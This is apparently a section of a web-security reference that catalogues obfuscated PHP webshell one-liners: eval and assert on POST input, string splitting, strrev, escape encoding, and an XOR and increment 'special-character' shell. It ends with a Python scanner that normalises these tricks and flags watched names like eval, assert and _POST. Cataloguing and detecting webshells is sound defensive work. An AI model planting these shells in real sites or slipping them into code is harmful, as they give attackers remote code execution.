5.1.8. WebShell
5.1.8.1. Common Variants
- GLOBALS
    eval($GLOBALS['_POST']['op']);
- $_FILE
    eval($_FILE['name']);
- String splitting
    assert(${"_PO"."ST"} ['sz']);
- Dynamic function execution
    $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
- create_function
    $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
- preg_replace
- rot13
- base64
- Radix conversion (hex and octal escapes)
    "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- Using the file name
    __FILE__
5.1.8.2. String Transformation Functions
- ucwords
- ucfirst
- trim
- substr_replace
- substr
- strtr
- strtoupper
- strtolower
- strtok
- str_rot13
5.1.8.3. Callback Functions
- call_user_func_array
- call_user_func
- array_filter
- array_walk
- array_map
- register_shutdown_function
- register_tick_function
- filter_var
- filter_var_array
- uasort
- uksort
- array_reduce
- array_walk_recursive
5.1.8.4. Special-Character Shell
PHP applies the XOR and increment operators directly to strings, so a shell can be built entirely out of special characters.
- @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);
- Building the names with increments:

    $_=[];
    $_=@"$_"; // $_='Array';
    $_=$_['!'=='@']; // $_=$_[0];
    $___=$_; // A
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
    $___.=$__; // S
    $___.=$__; // S
    $__=$_;
    $__++;$__++;$__++;$__++; // E
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
    $___.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $___.=$__;
    $____='_';
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
    $____.=$__;
    $__=$_;
    $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
    $____.=$__;
    $_=$$____;
    $___(base64_decode($_[_]));
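
A defender-side sketch of why plain keyword signatures miss the variants in 5.1.8.1 and 5.1.8.4, and how normalising first recovers them. This is an added example, not code from the original page: it folds string concatenation, strrev, string XOR and \x/octal escapes, reports watched names that only appear after folding, and flags sources whose variables are all underscores. The WATCH list, the function names and the min_vars threshold are assumptions, and the regex-based folding is heuristic where a production scanner would use a PHP tokenizer.

```python
import re

WATCH = ("eval", "assert", "create_function", "base64_decode", "_POST", "_GET")  # illustrative
DQ = r'"((?:[^"\\]|\\.)*)"'   # double-quoted PHP literal
SQ = r"'((?:[^'\\]|\\.)*)'"   # single-quoted PHP literal

def _q(s):
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"
def _b(s):
    return re.sub(r"\\([\\'])", r"\1", s)

def _dq(m):
    # Double quotes honour \xHH and \ooo escapes; rewrite as a single-quoted literal.
    if m[1] is None:
        return m[0]
    return _q(re.sub(r"\\(?:x([0-9a-fA-F]{1,2})|([0-7]{1,3}))",
                     lambda e: chr(int(e[1], 16) if e[1] else int(e[2], 8) & 0xFF), m[1]))

RULES = [
    (SQ + r"\s*\^\s*" + SQ,      # 'a' ^ 'b'  (PHP XORs strings byte by byte)
     lambda m: _q("".join(chr(ord(x) ^ ord(y)) for x, y in zip(_b(m[1]), _b(m[2]))))),
    (r"\bstrrev\s*\(\s*" + SQ + r"\s*\)", lambda m: _q(_b(m[1])[::-1])),
    (r"(?<![\w\]})])\(\s*" + SQ + r"\s*\)", lambda m: m[0][1:-1].strip()),  # ('x') -> 'x'
    (SQ + r"\s*\.\s*" + SQ, lambda m: _q(_b(m[1]) + _b(m[2]))),             # 'a'.'b'
]

def fold(src):
    """Constant-fold literal tricks to a bounded fixpoint; regex-based, so heuristic."""
    out = re.sub(DQ + "|" + SQ, _dq, src)
    for _ in range(32):
        prev = out
        for pattern, repl in RULES:
            out = re.sub(pattern, repl, out)
        if out == prev:
            break
    return out

def underscore_only(src, min_vars=4):
    """True when every variable name is made of underscores alone (5.1.8.4 style)."""
    names = re.findall(r"\$+(\w+)", src)
    return len(names) >= min_vars and all(set(n) == {"_"} for n in names)

def scan(src):
    folded = fold(src)
    hidden = [w for w in WATCH if w in folded and w not in src]
    return {"hidden": hidden, "underscore_only": underscore_only(src)}

if __name__ == "__main__":  # sample: the page's dynamic-function variant
    print(scan('$k="ass"."ert"; $k(${"_PO"."ST"} [\'sz\']);'))
```

The increment-only variant yields no hidden names because nothing in it is a foldable literal; it is caught by the underscore-only check instead, which is why the two signals are reported separately.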